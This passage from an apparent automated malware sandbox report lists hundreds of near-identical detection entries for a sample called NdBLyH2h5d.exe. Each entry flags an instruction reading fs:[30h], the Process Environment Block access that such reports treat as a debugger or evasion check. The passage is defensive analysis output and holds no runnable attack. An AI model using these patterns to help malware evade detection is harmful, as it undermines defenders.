          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]1_2_00A3F0BF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h]1_2_00A09080
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]1_2_00A83884
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]1_2_00A83884
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]1_2_00A040E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]1_2_00A040E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]1_2_00A040E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h]1_2_00A058EC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]1_2_00A1B02A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]1_2_00A3002D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]1_2_00AD4015
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]1_2_00AD4015
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]1_2_00A87016
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]1_2_00A87016
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]1_2_00A87016
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h]1_2_00AD1074
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h]1_2_00AC2073
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]1_2_00A20050
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]1_2_00A20050
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]1_2_00A361A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]1_2_00A361A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]1_2_00AC49A4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h]1_2_00A869A6
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]1_2_00A851BE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h]1_2_00A2C182
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h]1_2_00A3A185
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h]1_2_00A32990
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A0B1E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A0B1E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A0B1E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h]1_2_00A941E8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h]1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]1_2_00A3513A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]1_2_00A3513A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]1_2_00A09100
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]1_2_00A09100
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]1_2_00A09100
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h]1_2_00A0C962
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]1_2_00A0B171
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]1_2_00A0B171
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]1_2_00A2B944
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]1_2_00A2B944
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]1_2_00A052A5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A1AAB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A1AAB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A3FAB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]1_2_00A3D294
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]1_2_00A3D294
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h]1_2_00A32AE4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h]1_2_00A32ACB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]1_2_00A44A2C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]1_2_00A44A2C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h]1_2_00A18A0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]1_2_00A05210
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]1_2_00A0AA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]1_2_00A0AA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h]1_2_00A23A1C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]1_2_00ABB260
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]1_2_00ABB260
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h]1_2_00AD8A62
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h]1_2_00A4927A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]1_2_00A09240
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h]1_2_00ACEA55
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h]1_2_00A94257
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AD5BA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]1_2_00A34BAD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]1_2_00A34BAD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]1_2_00A34BAD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h]1_2_00AC138A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h]1_2_00ABD380
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]1_2_00A11B8F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]1_2_00A11B8F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h]1_2_00A3B390
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h]1_2_00A32397
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]1_2_00A303E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A2DBE9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]1_2_00A853CA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]1_2_00A853CA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h]1_2_00AC131B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A0DB60
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]1_2_00A33B7A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]1_2_00A33B7A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h]1_2_00A0DB40
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h]1_2_00AD8B58
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h]1_2_00A0F358
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h]1_2_00A1849B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h]1_2_00AC14FB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]1_2_00A86CF0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AD8CD6
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h]1_2_00A3BC2C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]1_2_00AD740D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]1_2_00A86C0A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]1_2_00AC1C06
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h]1_2_00A2746D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h]1_2_00A3A44B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]1_2_00A9C450
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]1_2_00A9C450
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]1_2_00AD05AC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]1_2_00AD05AC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h]1_2_00A335A1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]1_2_00A31DB5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]1_2_00A02D8A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]1_2_00A3FD9B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]1_2_00A3FD9B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ACFDE2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AB8DF1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h]1_2_00A0AD30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
